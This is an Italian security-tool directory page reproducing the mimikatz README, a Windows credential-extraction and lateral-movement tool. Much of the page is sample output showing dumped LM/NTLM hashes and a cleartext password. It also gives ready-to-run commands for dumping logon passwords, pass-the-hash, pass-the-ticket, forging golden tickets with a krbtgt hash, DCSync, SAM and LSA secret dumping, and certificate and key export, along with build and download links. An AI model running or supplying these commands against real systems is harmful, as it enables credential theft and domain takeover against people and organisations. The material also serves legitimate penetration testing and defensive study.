Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mimikatz — Strumento per estrarre credenziali Windows (password, hash, ticket Kerberos) dalla memoria ed eseguire attacchi pass-the-hash, pass-the-ticket e golden ticket. | Kitploit
Strumenti/GitHubGitHub/parrotsec/mimikatz
Escalation di PrivilegiMemory ForensicsAttacchi alle PasswordExploitMovimento LateralePenetration TestingAutenticazioneRed Teaming
GitHubparrotsec/mimikatz

mimikatz

Strumento per estrarre credenziali Windows (password, hash, ticket Kerberos) dalla memoria ed eseguire attacchi pass-the-hash, pass-the-ticket e golden ticket.

Vedi Repository
2.6k35642 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

mimikatz

mimikatz è uno strumento che ho creato per imparare il C e fare alcuni esperimenti con la sicurezza di Windows.

È ormai noto per estrarre password in chiaro, hash, codici PIN e ticket Kerberos dalla memoria. mimikatz può anche eseguire pass-the-hash, pass-the-ticket o costruire Golden ticket.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Ma non è tutto! Crypto, Terminal Server, Events, ... molte informazioni nella Wiki GitHub https://github.com/gentilkiwi/mimikatz/wiki o su http://blog.gentilkiwi.com (in francese, sì).

Se non vuoi compilarlo, i binari sono disponibili su https://github.com/gentilkiwi/mimikatz/releases

Utilizzo rapido

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault e lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilazione

mimikatz si presenta come una soluzione Visual Studio e un driver WinDDK (opzionale per le operazioni principali), quindi i prerequisiti sono:

  • per mimikatz e mimilib: Visual Studio 2010, 2012 o 2013 per Desktop (2013 Express per Desktop è gratuito e supporta x86 e x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • per il driver mimikatz, mimilove (e la piattaforma ddk2003): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz usa SVN per il controllo del codice sorgente, ma ora è disponibile anche con GIT! Puoi usare qualsiasi strumento tu voglia per la sincronizzazione, anche il GIT integrato in Visual Studio 2013 =)

Sincronizza!

  • L'URL GIT è: https://github.com/gentilkiwi/mimikatz.git
  • L'URL SVN è: https://github.com/gentilkiwi/mimikatz/trunk
  • Il file ZIP è: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Compila la soluzione

  • Dopo aver aperto la soluzione, Build / Build Solution (puoi cambiare architettura)
  • mimikatz ora è compilato e pronto all'uso! (Win32 / x64 anche ARM64 se sei fortunato)
    • potresti ottenere l'errore MSB3073 relativo a _build_.cmd e mimidrv, perché il driver non può essere compilato senza Windows Driver Kit 7.1 (WinDDK), ma mimikatz e mimilib funzionano.

ddk2003

Con questa piattaforma MSBuild opzionale, puoi usare gli strumenti di compilazione WinDDK e il runtime predefinito msvcrt (binari più piccoli, senza dipendenze)

Per questa piattaforma opzionale, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 e Visual Studio 2010 sono obbligatori, anche se prevedi di usare Visual Studio 2012 o 2013 in seguito.

Segui le istruzioni:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licenza

Licenza CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz ha bisogno di caffè per essere sviluppato:

  • PayPal: https://www.paypal.me/delpy/

Autore

  • Benjamin DELPY gentilkiwi, puoi contattarmi su Twitter ( @gentilkiwi ) o via email ( benjamin [at] gentilkiwi.com )
  • Le funzioni DCSync e DCShadow nel modulo lsadump sono state co-scritte con Vincent LE TOUX, puoi contattarlo via email ( vincent.letoux [at] gmail.com ) o visitare il suo sito web ( http://www.mysmartlogon.com )

Questo è uno sviluppo personale, per favore rispetta la sua filosofia e non usarlo per cose cattive!

Scarica lo strumento